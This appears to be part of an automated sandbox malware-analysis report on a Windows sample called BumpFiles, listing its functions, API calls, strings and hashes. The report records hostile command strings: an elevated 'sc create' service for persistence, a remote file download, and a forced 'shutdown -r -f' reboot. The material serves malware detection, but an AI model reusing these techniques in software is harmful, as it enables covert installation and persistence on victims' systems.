                                                                    • RegOpenKeyExW.ADVAPI32(80000002,Software\CodeGear\Locales,00000000,000F0019,?,80000001,Software\CodeGear\Locales,00000000,000F0019,?,80000002,Software\Embarcadero\Locales,00000000,000F0019,?,80000001), ref: 0040D0E8
                                                                    • RegOpenKeyExW.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,80000002,Software\CodeGear\Locales,00000000,000F0019,?,80000001,Software\CodeGear\Locales,00000000,000F0019,?,80000002), ref: 0040D106
                                                                    • RegOpenKeyExW.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,80000002,Software\CodeGear\Locales,00000000,000F0019,?,80000001), ref: 0040D124
                                                                    • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,00000000,?,00000000,0040D210,?,80000001,Software\Embarcadero\Locales,00000000,000F0019,?,00000000,0040D22D), ref: 0040D164
                                                                    • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,?,00000000,00000000,00000000,?,00000000,0040D210,?,80000001), ref: 0040D18F
                                                                    • RegCloseKey.ADVAPI32(?,0040D217,00000000,00000000,?,?,?,00000000,00000000,00000000,?,00000000,0040D210,?,80000001,Software\Embarcadero\Locales), ref: 0040D20A
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.3855472220.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000007.00000002.3855448670.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000007.00000002.3855698169.0000000000646000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000007.00000002.3855735386.000000000064B000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000007.00000002.3855773837.000000000064D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000007.00000002.3855878320.0000000000654000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000007.00000002.3856837977.0000000000658000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000007.00000002.3856903728.000000000065A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000007.00000002.3856938647.000000000065B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000007.00000002.3856938647.000000000065D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_400000_BumpFiles.jbxd
                                                                    Similarity
                                                                    • API ID: Open$QueryValue$CloseFileModuleName
                                                                    • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales$Software\CodeGear\Locales$Software\Embarcadero\Locales
                                                                    • API String ID: 2701450724-3496071916
                                                                    • Opcode ID: 671aabb344a02d4a21f5d1e96b5259cc6b85b314e7807c62b9a1e8afea213112
                                                                    • Instruction ID: 96a9666c888c6573c04f77d76a58949e2d0052d2a9ed3862a85dc5018720b54c
                                                                    • Opcode Fuzzy Hash: 671aabb344a02d4a21f5d1e96b5259cc6b85b314e7807c62b9a1e8afea213112
                                                                    • Instruction Fuzzy Hash: C5510275E80608BFEB10EAD5CC46FAF73BCEB58704F5044BABA04F61C1D6789A448A5D
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00410844 Relevance: 19.5, APIs: 9, Strings: 2, Instructions: 258COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 104 410844-4108de call 410cf4 call 410d04 call 410d14 call 410d24 * 3 117 4108e0-410903 RaiseException 104->117 118 410908-410915 104->118 119 410b18-410b1e 117->119 120 410917 118->120 121 41091a-41093a 118->121 120->121 122 41094d-410955 121->122 123 41093c-41094b call 410d34 121->123 125 410958-410961 122->125 123->125 127 410963-410973 125->127 128 41097a-41097c 125->128 127->128 140 410975 127->140 129 410982-410989 128->129 130 410a3e-410a48 128->130 134 410999-41099b 129->134 135 41098b-410997 129->135 131 410a58-410a5a 130->131 132 410a4a-410a56 130->132 138 410aa7-410aa9 131->138 139 410a5c-410a60 131->139 132->131 136 4109a8-4109aa 134->136 137 41099d-4109a6 LoadLibraryA 134->137 135->134 141 4109f7-410a03 call 410138 136->141 142 4109ac-4109bb GetLastError 136->142 137->136 147 410af1-410af4 138->147 148 410aab-410aba GetLastError 138->148 144 410a62-410a66 139->144 145 410a9b-410aa5 GetProcAddress 139->145 146 410af6-410afd 140->146 165 410a05-410a09 141->165 166 410a38-410a39 FreeLibrary 141->166 150 4109cb-4109cd 142->150 151 4109bd-4109c9 142->151 144->145 154 410a68-410a73 144->154 145->138 152 410b16 146->152 153 410aff-410b0e 146->153 147->146 156 410aca-410acc 148->156 157 410abc-410ac8 148->157 150->141 159 4109cf-4109f2 RaiseException 150->159 151->150 152->119 153->152 154->145 160 410a75-410a7b 154->160 156->147 158 410ace-410aee RaiseException 156->158 157->156 158->147 159->119 160->145 164 410a7d-410a8a 160->164 164->145 167 410a8c-410a97 164->167 165->130 168 410a0b-410a19 LocalAlloc 165->168 166->130 167->145 169 410a99 167->169 168->130 170 410a1b-410a36 168->170 169->147 170->130
                                                                    APIs
                                                                    • RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 004108FC
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.3855472220.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000007.00000002.3855448670.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000007.00000002.3855698169.0000000000646000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000007.00000002.3855735386.000000000064B000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000007.00000002.3855773837.000000000064D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000007.00000002.3855878320.0000000000654000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000007.00000002.3856837977.0000000000658000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000007.00000002.3856903728.000000000065A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000007.00000002.3856938647.000000000065B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000007.00000002.3856938647.000000000065D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_400000_BumpFiles.jbxd
                                                                    Similarity
                                                                    • API ID: ExceptionRaise
                                                                    • String ID: Lld$lld
                                                                    • API String ID: 3997070919-3762902296
                                                                    • Opcode ID: 607d2351983e50f33505caff717241c6807bb6ddee907fbd5a450f9bc46cac13
                                                                    • Instruction ID: 3f85bfe050b3ea984b5aeb894ecb8602a3e2b9af0aebbdfc5bfded10294532e9
                                                                    • Opcode Fuzzy Hash: 607d2351983e50f33505caff717241c6807bb6ddee907fbd5a450f9bc46cac13
                                                                    • Instruction Fuzzy Hash: 14A17DB5A003099FDB14CFE8D890BEEB7B5BF59314F14412AE505AB381DBB8A9C4CB54
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0040CCD4 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 76COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • EnterCriticalSection.KERNEL32(00651C14,00000000,0040CDD8,?,?,?,00000000,?,0040D6A0,00000000,0040D6FF,?,?,00000000,00000000,00000000), ref: 0040CCF2
                                                                    • LeaveCriticalSection.KERNEL32(00651C14,00651C14,00000000,0040CDD8,?,?,?,00000000,?,0040D6A0,00000000,0040D6FF,?,?,00000000,00000000), ref: 0040CD16
                                                                    • LeaveCriticalSection.KERNEL32(00651C14,00651C14,00000000,0040CDD8,?,?,?,00000000,?,0040D6A0,00000000,0040D6FF,?,?,00000000,00000000), ref: 0040CD25
                                                                    • IsValidLocale.KERNEL32(00000000,00000002,00651C14,00651C14,00000000,0040CDD8,?,?,?,00000000,?,0040D6A0,00000000,0040D6FF), ref: 0040CD37
                                                                    • EnterCriticalSection.KERNEL32(00651C14,00000000,00000002,00651C14,00651C14,00000000,0040CDD8,?,?,?,00000000,?,0040D6A0,00000000,0040D6FF), ref: 0040CD94
                                                                    • LeaveCriticalSection.KERNEL32(00651C14,00651C14,00000000,00000002,00651C14,00651C14,00000000,0040CDD8,?,?,?,00000000,?,0040D6A0,00000000,0040D6FF), ref: 0040CDBD
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.3855472220.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000007.00000002.3855448670.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000007.00000002.3855698169.0000000000646000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000007.00000002.3855735386.000000000064B000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000007.00000002.3855773837.000000000064D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000007.00000002.3855878320.0000000000654000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000007.00000002.3856837977.0000000000658000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000007.00000002.3856903728.000000000065A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000007.00000002.3856938647.000000000065B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000007.00000002.3856938647.000000000065D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_400000_BumpFiles.jbxd
                                                                    Similarity
                                                                    • API ID: CriticalSection$Leave$Enter$LocaleValid
                                                                    • String ID: en-GB,en,en-US,
                                                                    • API String ID: 975949045-3021119265
                                                                    • Opcode ID: dcfe28fe5da47c34272f0c7d91ae044fe9da86b6e61108bd54da0cc9d8f79f5b
                                                                    • Instruction ID: 257e64961a288cd264a0ffaab5fede5390936cc15f122fe2aa70ea45eab53adf
                                                                    • Opcode Fuzzy Hash: dcfe28fe5da47c34272f0c7d91ae044fe9da86b6e61108bd54da0cc9d8f79f5b
                                                                    • Instruction Fuzzy Hash: C021A1207C0700ABD710B7BA8C8276E359A9F46705F50853FB400BA2D3CA7D8C4597AE
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00633404 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 65windowCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • IsUserAnAdmin.SHELL32 ref: 00633424
                                                                    • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 006334A4
                                                                      • Part of subcall function 00424F1C: GetFileAttributesW.KERNEL32(00000000,?,?,?,?,?,0063344B,00000000,006334CB), ref: 00424F32
                                                                      • Part of subcall function 004258EC: CreateDirectoryW.KERNEL32(00000000,00000000,?,00633459,00000000,006334CB), ref: 004258F9
                                                                      • Part of subcall function 00633A38: Sleep.KERNEL32(0000012C,00000000,00633AEE), ref: 00633A6F
                                                                      • Part of subcall function 00633A38: URLDownloadToFileW.URLMON(00000000,00000000,00000000,00000000,00000000), ref: 00633A8C
                                                                      • Part of subcall function 00633A38: Sleep.KERNEL32(0000012C,0000012C,00000000,00633AEE), ref: 00633AC6
                                                                    Strings
                                                                    • FDFB72E7E69C5772296516FA15ADE623EB5317D590422D9D39B841583F69654EB01771A93E3C6685ECFDAF5044207C47AF2A6011DCB4EB23065CF5F0950FAB, xrefs: 00633467
                                                                    • C:\Program Files (x86)\Microsoft.NET\base, xrefs: 00633441, 0063344F
                                                                    • C:\Program Files (x86)\Microsoft.NET\fuge.zip, xrefs: 00633474
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.3855472220.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000007.00000002.3855448670.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000007.00000002.3855698169.0000000000646000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000007.00000002.3855735386.000000000064B000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000007.00000002.3855773837.000000000064D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000007.00000002.3855878320.0000000000654000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000007.00000002.3856837977.0000000000658000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000007.00000002.3856903728.000000000065A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000007.00000002.3856938647.000000000065B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000007.00000002.3856938647.000000000065D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_400000_BumpFiles.jbxd
                                                                    Similarity
                                                                    • API ID: FileSleep$AdminAttributesCreateDirectoryDownloadMessageUser
                                                                    • String ID: C:\Program Files (x86)\Microsoft.NET\base$C:\Program Files (x86)\Microsoft.NET\fuge.zip$FDFB72E7E69C5772296516FA15ADE623EB5317D590422D9D39B841583F69654EB01771A93E3C6685ECFDAF5044207C47AF2A6011DCB4EB23065CF5F0950FAB
                                                                    • API String ID: 3215071381-4060426360
                                                                    • Opcode ID: 843a8cac7f2f9cc8efd0aa34ab3001c845b0e3ab361ee83c73bc81c2c7516f43
                                                                    • Instruction ID: 8dad2de6a8b3dea3eefc5337c2ac44f97f3349aa0d5aad20445da69dd7c69d86
                                                                    • Opcode Fuzzy Hash: 843a8cac7f2f9cc8efd0aa34ab3001c845b0e3ab361ee83c73bc81c2c7516f43
                                                                    • Instruction Fuzzy Hash: 9811B670600714AFD711FF61DD52ADE73EADB48304F90446AF401A7393DA39AF0187A8
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00405CEC Relevance: 12.2, APIs: 8, Instructions: 221sleepCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 294 405cec-405cfb 295 405d01-405d05 294->295 296 405de4-405de7 294->296 297 405d07-405d0e 295->297 298 405d68-405d71 295->298 299 405ed4-405ed8 296->299 300 405ded-405df7 296->300 301 405d10-405d1b 297->301 302 405d3c-405d3e 297->302 298->297 307 405d73-405d7c 298->307 305 405778-40579d call 4056c8 299->305 306 405ede-405ee3 299->306 303 405da8-405db5 300->303 304 405df9-405e05 300->304 309 405d24-405d39 301->309 310 405d1d-405d22 301->310 313 405d40-405d51 302->313 314 405d53 302->314 303->304 316 405db7-405dc0 303->316 311 405e07-405e0a 304->311 312 405e3c-405e4a 304->312 323 4057b9-4057c0 305->323 324 40579f-4057ae VirtualFree 305->324 307->298 315 405d7e-405d92 Sleep 307->315 318 405e0e-405e12 311->318 312->318 320 405e4c-405e51 call 405540 312->320 313->314 319 405d56-405d63 313->319 314->319 315->297 321 405d98-405da3 Sleep 315->321 316->303 322 405dc2-405dd6 Sleep 316->322 325 405e54-405e61 318->325 326 405e14-405e1a 318->326 319->300 320->318 321->298 322->304 328 405dd8-405ddf Sleep 322->328 333 4057c2-4057de VirtualQuery VirtualFree 323->333 329 4057b0-4057b2 324->329 330 4057b4-4057b7 324->330 325->326 335 405e63-405e6a call 405540 325->335 331 405e6c-405e76 326->331 332 405e1c-405e3a call 405580 326->332 328->303 338 4057f3-4057f5 329->338 330->338 336 405ea4-405ed1 call 4055e0 331->336 337 405e78-405ea0 VirtualFree 331->337 340 4057e0-4057e3 333->340 341 4057e5-4057eb 333->341 335->326 347 4057f7-405807 338->347 348 40580a-40581a 338->348 340->338 341->338 346 4057ed-4057f1 341->346 346->333 347->348
                                                                    APIs
                                                                    • Sleep.KERNEL32(00000000,?,?,00000000,0040595E), ref: 00405D82
                                                                    • Sleep.KERNEL32(0000000A,00000000,?,?,00000000,0040595E), ref: 00405D9C
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.3855472220.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000007.00000002.3855448670.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000007.00000002.3855698169.0000000000646000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000007.00000002.3855735386.000000000064B000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000007.00000002.3855773837.000000000064D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000007.00000002.3855878320.0000000000654000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000007.00000002.3856837977.0000000000658000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000007.00000002.3856903728.000000000065A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000007.00000002.3856938647.000000000065B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000007.00000002.3856938647.000000000065D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_400000_BumpFiles.jbxd
                                                                    Similarity
                                                                    • API ID: Sleep
                                                                    • String ID:
                                                                    • API String ID: 3472027048-0
                                                                    • Opcode ID: a6815cf048d2a75c8910397385a2ca880fdec26ab6423f402ba9e5d1119bb45e
                                                                    • Instruction ID: 11846b2a77938f10269bbea534853d16cf35a90d37f20fdb129f70d6c98cb005
                                                                    • Opcode Fuzzy Hash: a6815cf048d2a75c8910397385a2ca880fdec26ab6423f402ba9e5d1119bb45e
                                                                    • Instruction Fuzzy Hash: 2E71B035604A008BD715DB29C888B17BBD5EF86314F18C1BFE888AB3D2D6B89C41DF95
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00633BD8 Relevance: 10.5, APIs: 1, Strings: 5, Instructions: 39COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • ShellExecuteW.SHELL32(00000000,runas,cmd.exe,00000000," start= auto,?), ref: 00633C30
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.3855472220.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000007.00000002.3855448670.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000007.00000002.3855698169.0000000000646000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000007.00000002.3855735386.000000000064B000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000007.00000002.3855773837.000000000064D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000007.00000002.3855878320.0000000000654000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000007.00000002.3856837977.0000000000658000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000007.00000002.3856903728.000000000065A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000007.00000002.3856938647.000000000065B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000007.00000002.3856938647.000000000065D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_400000_BumpFiles.jbxd
                                                                    Similarity
                                                                    • API ID: ExecuteShell
                                                                    • String ID: " start= auto$/C sc create WdCmdSvc binPath= "$cmd.exe$runas$:c
                                                                    • API String ID: 587946157-4108604376
                                                                    • Opcode ID: 3a720c6a98489e2c5b5c1e8405b5366311b48f20daa9e8cb8e3a826731f30606
                                                                    • Instruction ID: 319b91e3220b3ab50859801b3322155d411d05b55362160aac4d9e6ad888e803
                                                                    • Opcode Fuzzy Hash: 3a720c6a98489e2c5b5c1e8405b5366311b48f20daa9e8cb8e3a826731f30606
                                                                    • Instruction Fuzzy Hash: E7F0C230684314BFE701EB95CD83F9DFBBAEB45B10FA2007AB500B27C1D6786B108659
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00405968 Relevance: 9.0, APIs: 7, Instructions: 298sleepCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 415 405968-40597a 416 405980-405990 415->416 417 405bc8-405bcd 415->417 418 405992-40599f 416->418 419 4059e8-4059f1 416->419 420 405ce0-405ce3 417->420 421 405bd3-405be4 417->421 422 4059a1-4059ae 418->422 423 4059b8-4059c4 418->423 419->418 424 4059f3-4059ff 419->424 427 405714-40573d VirtualAlloc 420->427 428 405ce9-405ceb 420->428 425 405be6-405c02 421->425 426 405b8c-405b99 421->426 429 4059b0-4059b4 422->429 430 4059d8-4059e5 422->430 431 4059c6-4059d4 423->431 432 405a3c-405a45 423->432 424->418 434 405a01-405a0d 424->434 435 405c10-405c1f 425->435 436 405c04-405c0c 425->436 426->425 433 405b9b-405ba4 426->433 437 40576f-405775 427->437 438 40573f-40576c call 4056c8 427->438 445 405a80-405a8a 432->445 446 405a47-405a54 432->446 433->426 439 405ba6-405bba Sleep 433->439 434->418 440 405a0f-405a1b 434->440 443 405c21-405c35 435->443 444 405c38-405c40 435->444 441 405c6c-405c82 436->441 438->437 439->425 451 405bbc-405bc3 Sleep 439->451 440->419 452 405a1d-405a2d Sleep 440->452 449 405c84-405c92 441->449 450 405c9b-405ca7 441->450 443->441 454 405c42-405c5a 444->454 455 405c5c-405c5e call 40564c 444->455 447 405afc-405b08 445->447 448 405a8c-405ab7 445->448 446->445 456 405a56-405a5f 446->456 465 405b30-405b3f call 40564c 447->465 466 405b0a-405b1c 447->466 460 405ad0-405ade 448->460 461 405ab9-405ac7 448->461 449->450 462 405c94 449->462 463 405cc8 450->463 464 405ca9-405cbc 450->464 451->426 452->418 467 405a33-405a3a Sleep 452->467 457 405c63-405c6b 454->457 455->457 456->446 458 405a61-405a75 Sleep 456->458 458->445 468 405a77-405a7e Sleep 458->468 470 405ae0-405afa call 405580 460->470 471 405b4c 460->471 461->460 469 405ac9 461->469 462->450 472 405ccd-405cdf 463->472 464->472 473 405cbe-405cc3 call 405580 464->473 478 405b51-405b8a 465->478 481 405b41-405b4b 465->481 474 405b20-405b2e 466->474 475 405b1e 466->475 467->419 468->446 469->460 470->478 471->478 473->472 474->478 475->474
                                                                    APIs
                                                                    • Sleep.KERNEL32(00000000), ref: 00405A1F
                                                                    • Sleep.KERNEL32(0000000A,00000000), ref: 00405A35
                                                                    • Sleep.KERNEL32(00000000), ref: 00405A63
                                                                    • Sleep.KERNEL32(0000000A,00000000), ref: 00405A79
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.3855472220.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000007.00000002.3855448670.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000007.00000002.3855698169.0000000000646000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000007.00000002.3855735386.000000000064B000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000007.00000002.3855773837.000000000064D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000007.00000002.3855878320.0000000000654000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000007.00000002.3856837977.0000000000658000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000007.00000002.3856903728.000000000065A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000007.00000002.3856938647.000000000065B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000007.00000002.3856938647.000000000065D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_400000_BumpFiles.jbxd
                                                                    Similarity
                                                                    • API ID: Sleep
                                                                    • String ID:
                                                                    • API String ID: 3472027048-0
                                                                    • Opcode ID: a706dcada6f5eef1a9b79417e3615fb104c95944918c8e033a4465abe4e7dd09
                                                                    • Instruction ID: bdf7a1556342557ed6c5260c20dac2f68fef6da929d48900eeb6b1868b291bfe
                                                                    • Opcode Fuzzy Hash: a706dcada6f5eef1a9b79417e3615fb104c95944918c8e033a4465abe4e7dd09
                                                                    • Instruction Fuzzy Hash: CEC11476605B118BD715CF29E884317BBA2EB86310F1882BFD459AF3D5C3B4A881CF95
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00633A38 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 54sleepfilenetworkCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • Sleep.KERNEL32(0000012C,00000000,00633AEE), ref: 00633A6F
                                                                    • URLDownloadToFileW.URLMON(00000000,00000000,00000000,00000000,00000000), ref: 00633A8C
                                                                    • Sleep.KERNEL32(0000012C,0000012C,00000000,00633AEE), ref: 00633AC6
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.3855472220.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000007.00000002.3855448670.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000007.00000002.3855698169.0000000000646000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000007.00000002.3855735386.000000000064B000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000007.00000002.3855773837.000000000064D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000007.00000002.3855878320.0000000000654000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000007.00000002.3856837977.0000000000658000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000007.00000002.3856903728.000000000065A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000007.00000002.3856938647.000000000065B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000007.00000002.3856938647.000000000065D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_400000_BumpFiles.jbxd
                                                                    Similarity
                                                                    • API ID: Sleep$DownloadFile
                                                                    • String ID: dWe$hWe
                                                                    • API String ID: 2087964873-58362703
                                                                    • Opcode ID: 04cbe2486e640521b758a2ff6ddd802f746ddcb316689a65afaa4eebd1ce7cdd
                                                                    • Instruction ID: e38bbcdaf700aa6aab6cb9e7a4f3a98896630684cfae030678e04ef5b335f524
                                                                    • Opcode Fuzzy Hash: 04cbe2486e640521b758a2ff6ddd802f746ddcb316689a65afaa4eebd1ce7cdd
                                                                    • Instruction Fuzzy Hash: 62113D74600204AFD700EB55C892E8D77B5EF4A344F504076F504AB3E2D779AE019A99
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0063586C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 21sleepprocessCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 503 63586c-6358aa Sleep WinExec Sleep
                                                                    APIs
                                                                    • Sleep.KERNEL32(00002328,00000000,006358AB,?,:c,00639951,.exe,:c,0000012C,0000001E,00639966,00000000,0063998E,?,?,00000000), ref: 00635882
                                                                    • WinExec.KERNEL32(C:\WINDOWS\system32\shutdown.exe -r -t 1 -f,00000000), ref: 0063588E
                                                                    • Sleep.KERNEL32(0000012C,00002328,00000000,006358AB,?,:c,00639951,.exe,:c,0000012C,0000001E,00639966,00000000,0063998E,?,?), ref: 00635898
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.3855472220.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000007.00000002.3855448670.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000007.00000002.3855698169.0000000000646000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000007.00000002.3855735386.000000000064B000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000007.00000002.3855773837.000000000064D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000007.00000002.3855878320.0000000000654000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000007.00000002.3856837977.0000000000658000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000007.00000002.3856903728.000000000065A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000007.00000002.3856938647.000000000065B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000007.00000002.3856938647.000000000065D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_400000_BumpFiles.jbxd
                                                                    Similarity
